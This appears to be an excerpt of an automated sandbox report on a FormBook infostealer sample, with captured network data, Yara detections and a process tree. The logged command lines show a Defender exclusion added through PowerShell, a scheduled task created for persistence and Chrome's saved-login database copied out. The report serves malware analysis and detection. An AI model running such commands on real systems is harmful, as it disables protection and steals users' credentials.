3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 32 38 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c
                                                                                                      Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.28.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,


                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:15:28:36
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\iuvRyl9i7D.exe"
                                                                                                      Imagebase:0x960000
                                                                                                      File size:731648 bytes
                                                                                                      MD5 hash:F7ECD12D134AAF3541396C78337CE672
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296276978.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Target ID:3
                                                                                                      Start time:15:28:52
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
                                                                                                      Imagebase:0x1210000
                                                                                                      File size:430592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Reputation:high

                                                                                                      Target ID:4
                                                                                                      Start time:15:28:54
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff647620000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:5
                                                                                                      Start time:15:28:54
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
                                                                                                      Imagebase:0x230000
                                                                                                      File size:185856 bytes
                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:6
                                                                                                      Start time:15:28:55
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff647620000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:8
                                                                                                      Start time:15:28:58
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      Imagebase:0x2f0000
                                                                                                      File size:731648 bytes
                                                                                                      MD5 hash:F7ECD12D134AAF3541396C78337CE672
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low

                                                                                                      Target ID:12
                                                                                                      Start time:15:28:59
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      Imagebase:0x590000
                                                                                                      File size:731648 bytes
                                                                                                      MD5 hash:F7ECD12D134AAF3541396C78337CE672
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:low

                                                                                                      Target ID:18
                                                                                                      Start time:15:29:04
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                      Imagebase:0x7ff6f3b00000
                                                                                                      File size:3933184 bytes
                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:high

                                                                                                      Target ID:21
                                                                                                      Start time:15:29:33
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                      Imagebase:0xdf0000
                                                                                                      File size:114688 bytes
                                                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                      Reputation:moderate

                                                                                                      Target ID:28
                                                                                                      Start time:15:30:07
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                      Imagebase:0x1190000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:29
                                                                                                      Start time:15:30:09
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff647620000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      No disassembly